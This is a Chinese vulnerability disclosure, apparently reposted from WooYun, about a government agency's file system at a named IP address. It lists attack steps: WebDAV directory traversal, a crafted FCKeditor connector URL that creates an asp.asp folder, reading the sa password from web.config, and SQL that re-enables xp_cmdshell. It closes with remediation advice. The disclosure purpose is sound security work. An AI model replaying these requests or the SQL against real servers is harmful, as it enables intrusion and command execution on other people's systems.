国家某局某文件系统存在严重安全问题

2012-5-25 14:55:47 来源:网络转载 浏览:132
政府网站最新漏洞公开:国家某局某文件系统存在严重安全问题。
简要描述:
听名头有点大,小问题引发大漏洞,果断报乌云了,不求跨省,只求证书

详细说明:
1、系统地址
政府网站存在严重安全问题
    【图一】
2、服务器开启了WebDAV且允许PROPFIND,通过工具可对服务器进行遍历目录,同时还设置了目录浏览
政府网站存在严重安全问题
    【图二】
3、遍历后发现让人fuck的编辑器,版本为2.6,各问题文件均未删除
4、在http://219.143.32.27/FCKeditor/editor/filemanager/connectors/test.html尝试上传x.asp;x.jpg之类解析漏洞利用文件均会重命名为.jpg,创建asp.asp文件夹则会命名为asp_asp,使用其他方法也无果
政府网站存在严重安全问题
    【图三】
5、后通过http://219.143.32.27/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder,成功在/Upfile/upload/file/下建立asp.asp目录
政府网站存在严重安全问题
    【图四】
6、Get web.config后在里接拿到sa的密码,服务器与SQL数据库均在同一服务器
政府网站存在严重安全问题
    【图五】
7、目测是默认的系统配置,各组件均无删除,SQL执行;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 即可恢复对xp_cmdshell的调用
政府网站存在严重安全问题
    【图六】
8、后面我想你懂的


修复方案:
至于修补可以按照上面的点对应着来,其实有些事可大可小,这种内部oa系统最好还是限定一下ip,国密我想肯定是懂的,
由于该系统是北京海泰方圆科技有限公司提供的技术支持所以企业对产品和其他使用该产品的客户应该进行安全自检,因为没进行较多对该系统方面的测试,单单看到的UpFile等页面存在越权访问,虽然还未发现怎么利用,但发生在这种系统上是很不应该的。
(0)
(0)